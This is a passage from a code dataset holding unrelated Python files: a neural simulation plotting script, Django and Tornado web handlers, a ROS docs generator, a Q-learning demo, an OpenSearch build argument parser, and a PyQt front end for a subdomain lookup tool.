ax.spines[\"right\"].set_visible(False)\n ax.spines[\"top\"].set_visible(False)\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\nf.text(0.01, 0.5, 'Change in firing rate (Hz)', va='center', rotation='vertical')\nax.set_xlabel('Time (ms)')\n\n\n#########################################################################\n### Autocorrelation calculation, plots and exponential fits ############# \n#########################################################################\n## ACF of the ROIs are stacked as columns of numpy array\n\nimport statsmodels.api as sm \nfrom statsmodels.tsa.stattools import acf # For autocorrelation\nfrom scipy.optimize import curve_fit # For exponential curve fitting \n\n\n# Single exponential fit\ndef monoExp(x, tau):\n return np.exp(-tau * x) \n \n\n_ = plt.figure(figsize=(10,8)) \nnl=1000 # Lag index for autocorrelation\n\nACF=np.zeros((nl,p['n_area']))\nm=np.zeros(p['n_area'])\nTau_esti=np.zeros(p['n_area'])\n\ncols=['r','g','b','k'] # Colors for the plot\npara=(30) # Initial value for optimization\n\nfor k in range(p['n_area']):\n ACF[:,k]=acf(r_exc[:,k], nlags=nl-1)\n plt.plot(np.arange(nl)*dt,ACF[:,k],cols[k],label=p['areas'][k])\n \n # Cuve fitting\n params,_ = curve_fit(monoExp, np.arange(nl)*dt,ACF[:,k],para) \n #m[k]=params[0]\n Tau_esti[k]=params[0] \nplt.legend()\nplt.xlim(np.array([0, nl])*dt)\nplt.title(\"Autocorrelation of rate changes at different regions\",size=20)\nplt.xlabel(\"Lags (msec)\",size=14)\nplt.ylabel(\"Normalized Autocorrelation\",size=14)\n\n \n_ = plt.figure(figsize=(12,10)) \nfor k in range(p['n_area']):\n plt.subplot(int(str(22)+str(k+1)))\n plt.plot(np.arange(nl)*dt,ACF[:,k],label=\"ACF data\")\n plt.plot(np.arange(nl)*dt, \n monoExp(np.arange(nl)*dt,Tau_esti[k]),\n '--', label=\"fitted\")\n plt.title(p['areas'][k] + \"-- Esti. Tau: \"+ \n str(round(1/Tau_esti[k],2)) + \" msec\" ,size=20)\n \n \n\n\"\"\" \n################ Creation of BOLD resting state from the neural signals #####\n\n\n# Hemodynamic function\n\ndef Hemodynamic(n,TR,tauh=1.25*1e3,d=2.25*1e3):\n # f=[]\n # for k in range(n):\n # f.append((((k*TR)-d)*np.exp(((k*TR)-d)/tauh))/tauh**2)\n\n return [(((k*TR)-d)*np.exp(-((k*TR)-d)/tauh))/tauh**2 for k in range(n) if k!=0]\n \nplt.plot(Hemodynamic(100,2))\n\n############ COMPUTATION OF functional connectivity matrix ############\n\n \n\n \n\n# def AUTOcorr(x,lags=10):\n# M =len(x)\n# r =np.zeros(M) # One-sided autocorrelation\n \n# for i in range(M): \n# r[i]=(1/(M-i))*(sum(x[0:(M-i)] * x[i:M])) # Dot product in r\n \n# return(r[0:(lags+1)])\n \n\n# lgs=1000\n# AC1= AUTOcorr(r_exc[:,0],lgs)\n# AC2=AUTOcorr(r_exc[:,1],lgs)\n# plt.plot(AC1)\n# plt.plot(AC2/max(AC2))\n# plt.show()\n \n# lgs=1000\n# autocorrelation = np.correlate(r_exc[:,0], r_exc[:,0], mode=\"full\")\n# sm.graphics.tsa.plot_acf(r_exc[:,0], lags=lgs)\n# sm.graphics.tsa.plot_acf(r_exc[:,1], lags=lgs)\n# sm.graphics.tsa.plot_acf(r_exc[:,2], lags=lgs)\n\n#import matplotlib \n#matplotlib.pyplot.xcorr(r_exc[:,1], r_exc[:,1], normed=True, maxlags=1000)\n\n\n\n \n\n# plt.plot(np.arange(nl)*dt,acf(r_exc[:,0], nlags=nl-1),'r',label=p['areas'][0])\n# plt.plot(np.arange(nl)*dt,acf(r_exc[:,1], nlags=nl-1),'g',label=p['areas'][1])\n# plt.plot(np.arange(nl)*dt,acf(r_exc[:,2], nlags=nl-1),'b',label=p['areas'][2])\n# plt.plot(np.arange(nl)*dt,acf(r_exc[:,3], nlags=nl-1),'k',label=p['areas'][3])\n# plt.legend()\n# plt.xlim(np.array([0, nl])*dt)\n# plt.title(\"Autocorrelation of rate changes at different regions\",size=20)\n#plt.ylim([0,1.1])\n\"\"\"\n","sub_path":"Simulation_29_ROIs_WhiteNoiseInput.py","file_name":"Simulation_29_ROIs_WhiteNoiseInput.py","file_ext":"py","file_size_in_byte":9379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"14311823","text":"from sys import platform as _platform\nfrom django.http.response import JsonResponse\nimport random\nfrom app.raspberry.sensors import write_sensor_data, read_sensors, RaspberrySensors\nfrom timeit import default_timer as timer\n#from app.goldsprint.dal import Dal\nfrom abc import abstractmethod, ABCMeta\nfrom app.goldsprint.sprint_helper import SprintHelper\nfrom app.models import Settings\n\nraspberry_sensors = None\ncurrent_sprint = None\ntest_environment = \"win\" in _platform or \"darwin\" in _platform\n\ndef start_up():\n if test_environment:\n print('----------test environment----------')\n else:\n print('----------real environment----------')\n write_sensor_data(None,None,True)\n global raspberry_sensors\n raspberry_sensors = RaspberrySensors()\n\n\ndef get_measure_data(request):\n if current_sprint is not None:\n return JsonResponse({'success': True, \n 'data': current_sprint.get_data(request)})\n return JsonResponse({'success': False})\n\ndef start_measure(request):\n if current_sprint is not None: \n current_sprint.start()\n return JsonResponse({'success': True, 'data': None})\n return JsonResponse({'success': False})\n\n\ndef setup_sprint(request):\n global current_sprint\n if current_sprint is None:\n current_sprint = ISprintObject.create(request)\n return JsonResponse({'success': True, \n 'data': [serializable_dict(x.__dict__) for x in current_sprint.sprinter_objects]})\n return JsonResponse({'success': False})\n\ndef setup_ride(request):\n global current_sprint\n if current_sprint is None:\n current_sprint = IRideObject.create(request)\n return JsonResponse({'success': True, \n 'data': [serializable_dict(x.__dict__) for x in current_sprint.sprinter_objects]})\n return JsonResponse({'success': False})\n\n\ndef serializable_dict(orig):\n d = dict(orig)\n del d['rs']\n return d\n\n\ndef finish_ride(request):\n global current_sprint\n if current_sprint is not None:\n for x in current_sprint.sprinter_objects:\n x.end = timer()\n x.finish_time = x.end - x.start\n #Dal.save_result(request, current_sprint.sprinter_objects, False)\n SprintHelper.save_result(request, current_sprint.sprinter_objects, False)\n current_sprint.dispose()\n current_sprint = None\n\n\ndef reset_sprint():\n global current_sprint\n if current_sprint is not None:\n current_sprint.dispose()\n current_sprint = None\n\n\n\nclass MeasureObject:\n def __init__(self, distance_goal, circumference, measure_interval, rs, sensor):\n \n self.rs = rs\n self.sensor = sensor\n if self.rs is not None:\n self.rs.subscribe(sensor, self)\n\n self.distance_goal = distance_goal\n self.circumference = circumference\n self.measure_interval = measure_interval\n \n\n self.count = 0\n self.prev_count = 0\n self.distance = 0\n \n self.start = None\n self.end = None\n self.finish_time = None\n\n self.speeds = []\n self.avg_speed = None\n self.max_speed = None\n \n self.revs = []\n self.avg_rev = None\n self.max_rev = None\n\n \n def start_timer(self):\n self.start = timer()\n\n def wheel_turned(self):\n if self.start is not None and self.end is None:\n self.count += 1\n self.distance += self.circumference\n if self.distance_goal is not None and self.distance >= self.distance_goal:\n self.end = timer()\n self.finish_time = self.end-self.start\n self.desubscribe()\n\n def get_measure(self, fake = None):\n if fake is not None:\n for i in range(fake):\n self.wheel_turned()\n\n if self.end is None:\n self.update()\n return {\n 'finishTime':self.finish_time,\n 'distance':self.distance,\n 'speeds':self.speeds,\n 'avgSpeed':self.avg_speed,\n 'maxSpeed':self.max_speed,\n 'revs':self.revs,\n 'avgRev':self.avg_rev,\n 'maxRev':self.max_rev\n }\n \n def desubscribe(self):\n if self.rs is not None:\n self.rs.desubscribe(self.sensor)\n\n def update(self):\n current_count = self.count - self.prev_count\n self.prev_count = self.count\n\n self.revs.append(current_count*1000/self.measure_interval)\n \n #speed formula\n #km: rev*circumference/1000000 -> for circumference being mm\n #h: 3600*(1sec/measuretime) -> measure time being milliseconds\n #calculating constants:3600*1000/1000000 = 3.6\n constant = 3.6\n current_speed = constant*current_count*self.circumference/self.measure_interval\n if current_speed < 0:\n current_speed = 0\n self.speeds.append(current_speed)\n \n try:\n stats = [self.revs[0],0,self.speeds[0],0]\n for i in range(1,len(self.revs)):\n stats[0] += self.revs[i]\n if self.revs[i] > self.revs[stats[1]]:\n stats[1] = i\n stats[2] += self.speeds[i]\n if self.speeds[i] > self.speeds[stats[3]]:\n stats[3] = i\n self.avg_rev = stats[0]/len(self.revs)\n self.max_rev = self.revs[stats[1]]\n self.avg_speed = stats[2]/len(self.speeds)\n self.max_speed = self.speeds[stats[3]]\n except IndexError:\n pass\n\n\n#region SPRINT\n\nclass ISprintObject(metaclass=ABCMeta):\n def __init__(self):\n self.sprint_finished = False\n\n @abstractmethod\n def get_data(self, request):\n pass\n\n \n def dispose(self):\n for x in self.sprinter_objects:\n x.desubscribe()\n\n\n def start(self):\n for x in self.sprinter_objects:\n x.start_timer()\n\n def check_finish(self, request, measures):\n if not self.sprint_finished:\n sf = True\n for x in measures:\n if x['finishTime'] is None:\n sf = False\n if sf:\n self.sprint_finished = True\n #Dal.save_result(request, self.sprinter_objects)\n SprintHelper.save_result(request, self.sprinter_objects)\n\n @staticmethod\n def create(request):\n sensors = read_sensors()\n #settings = list(Dal.get_user_data(request).bikesettings_set.order_by('position').all())\n settings = list(Settings.manager.get_settings_ordered(request))\n interval = int(request.GET.get('measureInterval', 1000))\n if test_environment:\n return TestSprintObject(settings, sensors, interval)\n return SprintObject(settings, sensors, raspberry_sensors, interval)\n\n\nclass TestSprintObject(ISprintObject):\n def __init__(self, settings, sensors, measure_interval):\n super().__init__()\n self.seed = 2\n self.sprinter_objects = []\n for i in range(len(sensors)):\n if sensors[i]:\n x = settings[i]\n self.sprinter_objects.append(\n MeasureObject(x.distance, x.circumference, \n measure_interval, None, i))\n\n\n def get_data(self, request):\n if self.seed < 10:\n self.seed += 2\n measures = [x.get_measure(int(random.randint(self.seed,self.seed+3)*x.measure_interval/1000))\n for x in self.sprinter_objects] \n \n self.check_finish(request, measures)\n \n return {'data': measures, 'finished': self.sprint_finished}\n\n\nclass SprintObject(ISprintObject):\n def __init__(self, settings, sensors, rs, measure_interval):\n super().__init__()\n self.sprinter_objects = []\n for i in range(len(sensors)):\n if sensors[i]:\n x = settings[i]\n self.sprinter_objects.append(\n MeasureObject(x.distance, x.circumference, \n measure_interval, rs, i))\n\n def get_data(self, request):\n measures = [x.get_measure() for x in self.sprinter_objects] \n \n self.check_finish(request, measures)\n \n return {'data': measures, 'finished': self.sprint_finished}\n\n\n\n#region RIDE\n\nclass IRideObject(metaclass=ABCMeta):\n\n @abstractmethod\n def get_data(self, request):\n pass\n\n \n def dispose(self):\n for x in self.sprinter_objects:\n x.desubscribe()\n\n\n def start(self):\n for x in self.sprinter_objects:\n x.start_timer()\n\n @staticmethod\n def create(request):\n sensors = read_sensors()\n settings = list(Settings.manager.get_settings_ordered(request))\n #settings = list(Dal.get_user_data(request).bikesettings_set.order_by('position').all())\n interval = int(request.GET.get('measureInterval', 1000))\n if test_environment:\n return TestRideObject(settings, sensors, interval)\n return RideObject(settings, sensors, raspberry_sensors, interval)\n\n\nclass TestRideObject(IRideObject):\n def __init__(self, settings, sensors, measure_interval):\n self.seed = 2\n self.sprinter_objects = []\n for i in range(len(sensors)):\n if sensors[i]:\n x = settings[i]\n self.sprinter_objects.append(\n MeasureObject(None, x.circumference, \n measure_interval, None, i))\n\n\n def get_data(self, request):\n if self.seed < 6:\n self.seed += 1\n measures = [x.get_measure(int(random.randint(self.seed,self.seed+3)*x.measure_interval/1000))\n for x in self.sprinter_objects] \n \n return {'data': measures}\n\n\nclass RideObject(IRideObject):\n def __init__(self, settings, sensors, rs, measure_interval):\n self.sprinter_objects = []\n for i in range(len(sensors)):\n if sensors[i]:\n x = settings[i]\n self.sprinter_objects.append(\n MeasureObject(None, x.circumference, \n measure_interval, rs, i))\n\n def get_data(self, request):\n measures = [x.get_measure() for x in self.sprinter_objects]\n return {'data': measures}\n\n","sub_path":"goldsprint/app/goldsprint/sprint_logic.py","file_name":"sprint_logic.py","file_ext":"py","file_size_in_byte":10440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"638232982","text":"# Software License Agreement (BSD License)\n#\n# Copyright (c) 2009, Willow Garage, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of Willow Garage, Inc. nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n# Revision $Id: package_header.py 11472 2010-10-12 02:08:53Z kwc $\n# $Author: kwc $\n\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nimport yaml\n\n\ndef generate_repo_header(ctx, repo, stack_files, package_files):\n \"\"\"\n Generate repo.yaml files for MoinMoin Repo macros\n\n @param stack_files: list of stack.yaml files related to this repo\n @return: list of generate files (a single repo.yaml file)\n @rtype: [str]\n \"\"\"\n if repo.name is None:\n sys.stderr.write(\"Invalid repo file (repo.name is None), ignoring\\n\")\n return []\n\n repo_data = {\n 'name': repo.name,\n 'vcs': {\n 'type': repo.type,\n 'uri': repo.uri,\n },\n 'stacks': {},\n 'packages': {},\n }\n for f in stack_files:\n name = os.path.basename(os.path.dirname(f))\n if os.path.isfile(f):\n with open(f) as yaml_f:\n # trim down metadata as repo files can be very large\n d = yaml.load(yaml_f)\n for k in ['depends', 'depends_on', 'repository', 'review_notes', 'review_status', 'vcs']:\n try:\n del d[k]\n except:\n pass\n repo_data['stacks'][name] = d\n\n for f in package_files:\n name = os.path.basename(os.path.dirname(f))\n if os.path.isfile(f):\n with open(f) as yaml_f:\n # trim down metadata as repo files can be very large. This\n # metadata is available elsewhere.\n d = yaml.load(yaml_f)\n for k in ['depends', 'depends_on', 'siblings', 'msgs', 'srvs', 'dependency_tree', 'repository', 'review_notes', 'review_status', 'api_documentation', 'description', 'vcs']:\n try:\n del d[k]\n except:\n pass\n repo_data['packages'][name] = d\n\n filename = os.path.join(ctx.docdir, repo.name, 'repo.yaml')\n filename_dir = os.path.dirname(filename)\n if not os.path.isdir(filename_dir):\n os.makedirs(filename_dir)\n\n with open(filename, 'w') as f:\n print(\"generating repo header %s\"%(filename))\n f.write(yaml.safe_dump(repo_data, default_style=\"'\"))\n\n return [filename_dir]\n","sub_path":"rosdoc_rosorg/src/rosdoc_rosorg/repo_header.py","file_name":"repo_header.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"118515902","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport base\nfrom config.schema import Relation,User\nimport util.database\n\n\nclass ProjectRelationHandler(base.BaseHandler):\n def get(self):\n self.check()\n session = util.database.Session()\n \n project_id = self.get_secure_cookie(\"projectid\")\n if project_id:\n relationlist = session.query(Relation).filter(Relation.project_id == project_id).order_by(Relation.target_id).all() \n\n userlist = session.query(User).filter(User.project_id == project_id).all()\n else:\n relationlist = None\n userlist = None\n self.render(\"member/projectrelation.html\", userlist = userlist, relationlist = relationlist, error = \"\")\n\n session.close()\n\n\n def post(self):\n self.check()\n self.redirect(\"/member/projectrelation\")\n\n","sub_path":"src/handlers/member/projectrelation.py","file_name":"projectrelation.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"72166183","text":"class Solution:\r\n def strStr(self, haystack: 'str', needle: 'str') -> 'int':\r\n if haystack == needle:\r\n return 0\r\n for i in range(0, (len(haystack) - len(needle)+1)):\r\n if haystack[i:i + len(needle)] == needle:\r\n return i\r\n return -1\r\n\r\n\r\nmyClass = Solution()\r\nresult = myClass.strStr(\"hello\", \"ll\")\r\nprint(result)\r\n","sub_path":"UnFinished/LeetCode_028_Implement strStr().py","file_name":"LeetCode_028_Implement strStr().py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"548575943","text":"from mTree.microeconomic_system.environment import Environment\nfrom mTree.microeconomic_system.message import Message\nfrom mTree.microeconomic_system.directive_decorators import *\n\n\n@directive_enabled_class\nclass BasicEnvironment(Environment):\n def __init__(self):\n self.institutions = []\n self.agents = []\n self.bundle = []\n self.experiment = None\n self.total_experiments = None\n #self.all_rounds = [] # for each period we store final data here\n\n\n @directive_decorator(\"initialize_rows\")\n def initialize_rows(self, message:Message):\n '''makes the rows of the choices as list of tuples'''\n payload = message.get_payload()\n\n #set the rewards\n reward_A_1 = payload[\"reward_A_1\"]\n reward_A_2 = payload[\"reward_A_2\"]\n reward_B_1 = payload[\"reward_B_1\"]\n reward_B_2 = payload[\"reward_B_2\"]\n num_rows = payload[\"num_rows\"] # number of rows in the bundle\n\n # creates each row and append to bundle\n for i in range(1, num_rows + 1):\n optionA = ([((i / num_rows), reward_A_1), ((((num_rows - i) / num_rows)), reward_A_2), \"A_%d\" % i])\n optionB = ([((i / num_rows), reward_B_1), ((((num_rows - i) / num_rows)), reward_B_2), \"B_%d\" % i])\n self.bundle.append([optionA, optionB]) # append each row to the bundle\n\n self.experiment = payload[\"experiment\"]\n self.total_experiments = payload[\"total_experiments\"]\n self.run = payload[\"run\"]\n self.total_runs = payload[\"total_runs\"]\n\n @directive_decorator(\"send_bundle\")\n def send_bundle(self,message:Message):\n ''' sends bundle from environment to institution'''\n\n #create message to send to institution\n message = Message()\n message.set_sender(self)\n message.set_directive(\"fill_in_rows\")\n payload = {}\n\n #create the payload w/ bundle\n payload[\"bundle\"] = self.bundle\n payload[\"experiment\"] = self.experiment\n payload[\"total_experiments\"] = self.total_experiments\n payload[\"run\"] = self.run\n payload[\"total_runs\"] = self.total_runs\n message.set_payload(payload)\n self.bundle = []\n\n #send to all institutions\n for i in self.institutions:\n self.send(i,message)\n\n\n @directive_decorator(\"initialize_agents\")\n def initialize_agents(self, message: Message):\n '''give each of the agents their attributes and sends the info to institution for data collecting'''\n\n # contains the theta and sd\n payload = message.get_payload()\n #self.theta = payload[\"theta\"]\n #self.sd = payload[\"sd\"]\n\n #make the message to send to each agent\n message = Message()\n message.set_sender(self)\n message.set_directive(\"initialize_agents\")\n message.set_payload(payload)\n\n #send message to all agents\n for agent in self.agents:\n self.send(agent, message)\n\n #create message for the institution\n message = Message()\n message.set_sender(self)\n message.set_directive(\"theta_sd\")\n message.set_payload(payload)\n\n #send the theta and delta to the institution for data collection\n for institution in self.institutions:\n self.send(institution,message)\n\n @directive_decorator(\"send_agents\")\n def send_agents(self, message: Message):\n '''Send a list of agents to the institutions'''\n\n #create message to institutions\n message = Message()\n message.set_sender(self)\n message.set_directive(\"fill_in_agents\")\n\n #create the payload with a list of agents\n payload = {}\n payload[\"agents\"] = self.agents\n message.set_payload(payload)\n\n #send msg to the institution\n for i in self.institutions:\n self.send(i,message)\n\n @directive_decorator(\"send_institution\")\n def send_institution(self, message: Message):\n '''Send a list of the institutions to agents '''\n\n #create message\n message = Message()\n message.set_sender(self)\n message.set_directive(\"fill_in_institution\")\n\n #create payload with institutions\n payload = {}\n payload[\"institutions\"] = self.institutions\n message.set_payload(payload)\n\n #send to all agents\n for i in self.agents:\n self.send(i,message)\n\n\n @directive_decorator(\"start_experiment\")\n def start_experiment(self, message: Message):\n '''Start the actual experiment'''\n\n message = Message()\n message.set_sender(self)\n message.set_directive(\"start_experiment\")\n\n #send the message to all institutions\n for i in self.institutions:\n self.send(i,message)\n\n @directive_decorator(\"collect_data\")\n def collect_data(self, message: Message):\n '''tells in institution to send the data to the container'''\n\n #create message\n message = Message()\n message.set_sender(self)\n message.set_directive(\"collect_data\")\n\n #send to all institutions\n for i in self.institutions:\n self.send(i, message)\n\n\n\n\n\n","sub_path":"Holt_Laury Monte Carlo and analysis/basic_envrionment.py","file_name":"basic_envrionment.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"303006282","text":"import numpy as np\n# R matrix\nR = np.matrix([ [-1,-1,-1,-1,0,-1],\n [-1,-1,-1,0,-1,100],\n [-1,-1,-1,0,-1,-1],\n [-1,0,0,-1,0,-1],\n [-1,0,0,-1,-1,100],\n [-1,0,-1,-1,0,100],])\n# Q matrix\nQ = np.matrix(np.zeros([6,6]))\n# Gamma --> Learning Parameter \ngamma = 0.9\n# initial state (to be chosen at random)\ninital_state = 1\n#this function returns all available action in the state given as an argument \ndef available_action(state):\n current_state_row = R[state,]\n av_act =np.where(current_state_row>=0)[1]\n return av_act\n# get available action in the curretn state\navailable_act = available_action(inital_state)\n# this function choses at random which action is to be performed within the range of all available actions\ndef sample_next_action(available_action_range):\n next_action = int(np.random.choice(available_act, 1))\n return next_action\n# sample next action to be performed \naction = sample_next_action(available_act)\n#this function updated the Q matrix according to the path selected and the @ learning algorithm\ndef update(current_state,action,gamma):\n max_index = np.where(Q[action,] == np.max(Q[action, ]))[1] \n if max_index.shape[0]>1:\n max_index = int(np.random.choice(max_index, size=1))\n else:\n max_index = int(max_index)\n max_value = Q[action, max_index]\n # Q learning formula\n Q[current_state, action] = R[current_state, action] + gamma * max_value\n#update Q matrix \nupdate(inital_state,action,gamma)\n#-------- TRAINING -----------\n# train over 10000 iterations (Re-iterate the process above )\nfor i in range(10000):\n current_state = np.random.randint( 0, int(Q.shape[0]))\n available_act = available_action(current_state)\n action = sample_next_action(available_act)\n update(current_state,action,gamma)\n#normalize the trained Q function \nprint(\"Trained Q matrix: \\n\")\nprint(Q / np.max(Q)*100)\n#-------- TESTING -----------\n#goal state = 5\n#best sequence path starting from 2-> 2, 3 ,1 ,5 to gain max rewards\ncurrent_state = 3\nsteps = [current_state]\nwhile current_state!=5:\n next_step_index = np.where(Q[current_state,] == np.max(Q[current_state,]))[1]\n if next_step_index.shape[0] > 1:\n next_step_index = int(np.random.choice(next_step_index, size=1))\n else:\n next_step_index = int(next_step_index)\n steps.append(next_step_index)\n current_state = next_step_index\n# print selected sequence od steps \nprint( \" Selected path: \\n\")\nprint(steps)","sub_path":"shortestpath.py","file_name":"shortestpath.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"485672019","text":"from math import sin, cos, pi\nfrom typing import Union\n\n\n# Type declarations\nclass Move(object):\n def __init__(self, dx: float, dy: float) -> None:\n self.dx = dx\n self.dy = dy\n\n\nclass Rotate(object):\n def __init__(self, degrees: float) -> None:\n self.degrees = degrees\n\n\nclass NoOp(object):\n pass\n\nAction = Union[Move, Rotate, NoOp]\n\n\nclass State(object):\n def __init__(self, x: float, y: float) -> None:\n self.x = x\n self.y = y\n\n def __repr__(self) -> str:\n return 'State({}, {})'.format(self.x, self.y)\n\n\n# Actual code here\ndef update(state: State, action: Action) -> State:\n if isinstance(action, Move):\n return State(state.x + action.dx, state.y + action.dy)\n elif isinstance(action, Rotate):\n s = sin(action.degrees)\n c = cos(action.degrees)\n return State(c * state.x + s * state.y, -s * state.x + c * state.y)\n elif NoOp:\n return state\n\n\ndef main() -> None:\n state = State(0.0, 0.0)\n state = update(state, Move(1.0, -1.0))\n state = update(state, Rotate(pi / 2.0))\n print(state)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"109205748","text":"# SPDX-License-Identifier: Apache-2.0\n#\n# The OpenSearch Contributors require contributions made to\n# this file be licensed under the Apache-2.0 license or a\n# compatible open source license.\n\nimport argparse\nimport logging\nimport sys\n\n\nclass BuildArgs:\n manifest: str\n snapshot: bool\n component: str\n keep: bool\n\n def __init__(self):\n parser = argparse.ArgumentParser(description=\"Build an OpenSearch Bundle\")\n parser.add_argument(\n \"manifest\", type=argparse.FileType(\"r\"), help=\"Manifest file.\"\n )\n parser.add_argument(\n \"-s\",\n \"--snapshot\",\n action=\"store_true\",\n default=False,\n help=\"Build snapshot.\",\n )\n parser.add_argument(\n \"-c\", \"--component\", type=str, help=\"Rebuild a single component.\"\n )\n parser.add_argument(\n \"--keep\",\n dest=\"keep\",\n action=\"store_true\",\n help=\"Do not delete the working temporary directory.\",\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"Show more verbose output.\",\n action=\"store_const\",\n default=logging.INFO,\n const=logging.DEBUG,\n dest=\"logging_level\",\n )\n\n args = parser.parse_args()\n self.logging_level = args.logging_level\n self.manifest = args.manifest\n self.snapshot = args.snapshot\n self.component = args.component\n self.keep = args.keep\n self.script_path = sys.argv[0].replace(\"/src/build.py\", \"/build.sh\")\n\n def component_command(self, name):\n return \" \".join(\n filter(\n None,\n [\n self.script_path,\n self.manifest.name,\n f\"--component {name}\",\n \"--snapshot\" if self.snapshot else None,\n ],\n )\n )\n","sub_path":"bundle-workflow/src/build_workflow/build_args.py","file_name":"build_args.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"48592995","text":"from django.shortcuts import render, reverse, HttpResponseRedirect\n\nfrom ghostposts.models import GhostPost\nfrom ghostposts.forms import GhostPostForm\n\nhtml= 'index.htm'\n\ndef index(request):\n data = GhostPost.objects.all().order_by('-submission_time')\n return render(request, html, {'data': data})\n\n\ndef add_ghost_post(request):\n if request.method == 'POST':\n form = GhostPostForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n GhostPost.objects.create(\n boast_or_roast=data['boast_or_roast'],\n post=data['post'],\n )\n return HttpResponseRedirect(reverse('home'))\n\n form = GhostPostForm()\n return render(request, 'post.htm', {'form': form})\n\ndef boasts(request):\n data = GhostPost.objects.filter(boast_or_roast=True).order_by('-submission_time')\n return render(request, html, {'data': data})\n\ndef roasts(request):\n data = GhostPost.objects.filter(boast_or_roast=False).order_by('-submission_time')\n return render(request, html, {'data': data})\n\ndef likes(request, id):\n post = GhostPost.objects.get(id=id)\n post.up_votes += 1\n post.save()\n return HttpResponseRedirect(reverse('home'))\n\ndef dislikes(request, id):\n post = GhostPost.objects.get(id=id)\n post.down_votes += 1\n post.save()\n return HttpResponseRedirect(reverse('home'))\n\ndef most_liked(request):\n data = GhostPost.objects.order_by('-up_votes')\n return render(request, html, {'data': data})\n\ndef least_liked(request):\n data = GhostPost.objects.order_by('up_votes')\n return render(request, html, {'data': data})\n","sub_path":"ghostposts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"423514237","text":"# very basic terminal emulator in pyqt\n# https://pythonbasics.org/pyqt/\n\nfrom PyQt5 import QtWidgets, uic\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtGui import QIcon\nimport sys\nimport os\nimport subprocess\nfrom sub import main\nimport time\n\n\n\nclass Subdomain(QtWidgets.QMainWindow):\n def __init__(self):\n super(Subdomain, self).__init__()\n uic.loadUi('subUI.ui', self)\n self.setWindowIcon(QIcon('2435355-200.png'))\n self.setWindowTitle('Subdomain Finder')\n # self.lineEdit.returnPressed.connect(self.doCMD)\n # self.pushButtonInstall.clicked.connect(self.onClick)\n self.startBtn.clicked.connect(self.on_startClick)\n self.backBtn.clicked.connect(self.on_backClick)\n self.resetBtn.clicked.connect(self.on_resetClick)\n\n\n @pyqtSlot()\n def on_resetClick(self):\n\n self.url.setText('')\n # self.port.setText('')\n self.outPut.setText('')\n\n\n @pyqtSlot()\n def on_backClick(self):\n from startUI import Start\n self.f = Start()\n self.f.show()\n self.hide()\n\n @pyqtSlot()\n def on_startClick(self):\n url=str(self.url.text())\n self.outPut.append('Searching for domain: '+url)\n ans = main(url)\n for a in range(len(ans)):\n\n if a==2:\n for i in ans[2]:\n print(i)\n self.outPut.append(str(i))\n else:\n self.outPut.append(str(ans[a]))\n\n\nif __name__ == '__main__':\n\n app = QtWidgets.QApplication([])\n win = Subdomain()\n win.show()\n sys.exit(app.exec())\n","sub_path":"subUI.py","file_name":"subUI.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"211685665","text":"# utility\n\nclass Utility:\n @staticmethod\n def gen(it_obj):\n for item in it_obj:\n yield item\n\n @staticmethod\n def print_dict(some_dict):\n for key in Utility.gen(some_dict):\n print 